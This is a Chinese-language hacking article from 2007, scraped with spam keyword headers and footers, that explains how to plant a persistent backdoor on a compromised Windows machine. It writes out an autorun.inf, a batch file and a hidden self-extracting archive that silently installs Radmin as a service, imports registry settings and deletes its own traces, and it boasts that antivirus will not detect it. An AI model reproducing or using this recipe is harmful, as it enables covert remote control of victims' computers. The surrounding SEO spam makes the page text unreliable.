国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

黑客入侵網站后全自動安裝后門
2007-01-19   

這里只需要你有上傳的權限。

一共三個文件:1.Autorun.inf、2.Shell.bat、3.Hao.exe(自解壓文件)。

思路:

全部放在C盤下。當肉雞主人雙擊C盤時自動運行第一文件,第一文件帶動運行第二文件,同時第二運行第三運行完可正常進入C盤。不會讓人發覺。并且里面所帶的批處理,會在最后把所有文件刪除。此時,后門卻已經裝上去了(此法針對沒有權限運行木馬的入侵活動)。

制作:

[autorun] open=shell.bat,這個是autorun.inf @echo off hao.exe c:\windows\explorer c:\ del autorun.inf del rad.exe del shell.ba,這個是shell.bat hao.exe,里面包含admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五個文件(關鍵所在)r.bat——批處理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat,其他四個就是Radmin的文件。這個大家都會,復制過來就行。

我們再來看自解壓的處理。在解壓路徑里我們用 %systemroot%\system32,就是解壓到系統目錄里,并且“解壓后運行”填上我們的r.bat文件。因為這里的文件比較多,比較隱蔽。解壓模式我們選 “全部隱藏”,和 “覆蓋所有文件”! 好了,一個不被殺毒軟件所能查殺的好后門程序就成功制作出來了!

大家不要放在文件夾里壓縮哦,要直接選上admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五個文件壓縮,這樣就行啦。

責任編輯: 雪花(TEL:(010)68476636-8008)

熱詞搜索:

上一篇:使用MD5變換算法來防止窮舉破譯密碼
下一篇:黑客技巧 通過系統權限法來清理木馬

分享到: 收藏
主站蜘蛛池模板: 泾阳县| 正镶白旗| 巴彦淖尔市| 连南| 蛟河市| 陇西县| 新竹县| 沅陵县| 共和县| 西充县| 黔东| 景泰县| 桐庐县| 潜江市| 多伦县| 景宁| 贺兰县| 临沂市| 股票| 德安县| 宜良县| 手游| 西城区| 南平市| 鹤壁市| 利川市| 徐州市| 永福县| 丹巴县| 定州市| 冀州市| 边坝县| 玉树县| 牡丹江市| 七台河市| 黄平县| 宜君县| 来安县| 崇州市| 肇东市| 温州市|